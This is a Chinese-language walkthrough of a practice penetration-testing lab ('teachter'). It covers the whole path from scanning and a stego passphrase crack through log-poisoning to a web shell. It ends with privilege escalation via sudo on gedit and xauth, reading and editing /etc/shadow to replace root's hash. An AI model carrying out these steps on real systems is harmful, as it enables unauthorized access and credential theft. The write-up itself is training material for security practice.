【OSCP】teachter

admin 2024年9月24日12:48:12评论14 views字数 3156阅读10分31秒阅读模式
【OSCP】teachter

OSCP 靶场

【OSCP】teachter

靶场介绍

teachter

easy

StegSeek爆破、图片隐写、日志利用getshell、sudo—gedit&xauth提权

信息收集

主机发现

nmap -sn 192.168.1.0/24

【OSCP】teachter

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.14
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 04:24 EST
Nmap scan report for 192.168.1.14
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 1e:21:69:d3:57:da:3a:04:0b:6f:f4:50:fb:97:13:10 (RSA)
| 256 36:ee:7f:57:1d:a5:b5:ce:1f:41:ba:b0:43:32:2e:ff (ECDSA)
|_ 256 f2:bd:80:dd:e5:05:02:49:c3:3b:9f:83:29:cb:54:96 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:4E:6E:DC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 192.168.1.14

目录扫描

【OSCP】teachter

【OSCP】teachter

【OSCP】teachter

发现图片存在隐写

【OSCP】teachter

┌──(root㉿kali)-[~/下载]
└─# stegseek rabbit.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "rabbithole"
[i] Original filename: "secret.txt".
[i] Extracting to "rabbit.jpg.out".

爆破后,获取到如下信息,但是不知道是啥东西。先放着。

【OSCP】teachter

权限获取

这里可以看到一个清除日志一个记录日志,还有一个接口时access.php

【OSCP】teachter

我们尝试对access.php 接口进行fuzz,爆破到了id参数

# ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.14/access.php?FUZZ=id --fs=12

【OSCP】teachter

【OSCP】teachter

可以发现通过这个id访问的记录会被记录到log.php

【OSCP】teachter

尝试传入phpinfo信息,然后访问成功。那么接下来我们直接写入shell。

【OSCP】teachter

【OSCP】teachter

【OSCP】teachter

这里发现存在一个pdf文件,可以看到存在一个密码

【OSCP】teachter

【OSCP】teachter

【OSCP】teachter

废了好大劲看出来,他就是:ThankYouTeachers

【OSCP】teachter

权限提升

【OSCP】teachter

gedit 是个文本编辑器,xauth命令则是用于编辑和显示连接 X 服务器时使用的授权信息。

【OSCP】teachter

【OSCP】teachter

接下来我们尝试使用编辑器gedit来编辑 root haciendo X11 并使用SSH进行转发

利用参考链接:https://www.thegeekdiary.com/how-to-set-x11-forwarding-export-remote-display-for-users-who-switch-accounts-using-sudo/

利用过程如下:

1、使用kali 连接

ssh -X mrteacher@192.168.1.14

2、列出display,获取cookie

mrteacher@Teacher:~$ xauth list $DISPLAY
Teacher/unix:10 MIT-MAGIC-COOKIE-1 889261342a4e8cd77e68ea9b0f8888f9
mrteacher@Teacher:~$ echo $DISPLAY
localhost:10.0

3、添加cookie 到 sudo 的用户

sudo xauth add Teacher/unix:10  MIT-MAGIC-COOKIE-1 889261342a4e8cd77e68ea9b0f8888f9

4、使用sudo 执行如下命令读取shadow 文件

sudo gedit /etc/shadow

【OSCP】teachter

获取密码后我们使用john 对shadow 进行爆破,但是能否成功取决于密码。

【OSCP】teachter

这里我们将root 账户的hash 更改为mrteacher 然后保存,使用mrteacher 登录即可

root:$y$j9T$gOGCuq/iq84ssczF0sQBS1$Z6OoF9kPK824CPeFsPv.A9JvDFF5DEK0wB/neVm.Gi8:19228:0:99999:7:::
daemon:*:19228:0:99999:7:::
bin:*:19228:0:99999:7:::
sys:*:19228:0:99999:7:::
sync:*:19228:0:99999:7:::
games:*:19228:0:99999:7:::
man:*:19228:0:99999:7:::
lp:*:19228:0:99999:7:::
mail:*:19228:0:99999:7:::
news:*:19228:0:99999:7:::
uucp:*:19228:0:99999:7:::
proxy:*:19228:0:99999:7:::
www-data:*:19228:0:99999:7:::
backup:*:19228:0:99999:7:::
list:*:19228:0:99999:7:::
irc:*:19228:0:99999:7:::
gnats:*:19228:0:99999:7:::
nobody:*:19228:0:99999:7:::
_apt:*:19228:0:99999:7:::
systemd-network:*:19228:0:99999:7:::
systemd-resolve:*:19228:0:99999:7:::
messagebus:*:19228:0:99999:7:::
avahi-autoipd:*:19228:0:99999:7:::
sshd:*:19228:0:99999:7:::
mrteacher:$y$j9T$gOGCuq/iq84ssczF0sQBS1$Z6OoF9kPK824CPeFsPv.A9JvDFF5DEK0wB/neVm.Gi8:19228:0:99999:7:::
systemd-timesync:!*:19228::::::
systemd-coredump:!*:19228::::::

我们也可以直接写入passwd 账户

【OSCP】teachter

【OSCP】teachter

End

“点赞、在看与分享都是莫大的支持”

【OSCP】teachter

【OSCP】teachter

原文始发于微信公众号(贝雷帽SEC):【OSCP】teachter

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月24日12:48:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】teachterhttps://cn-sec.com/archives/3202067.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息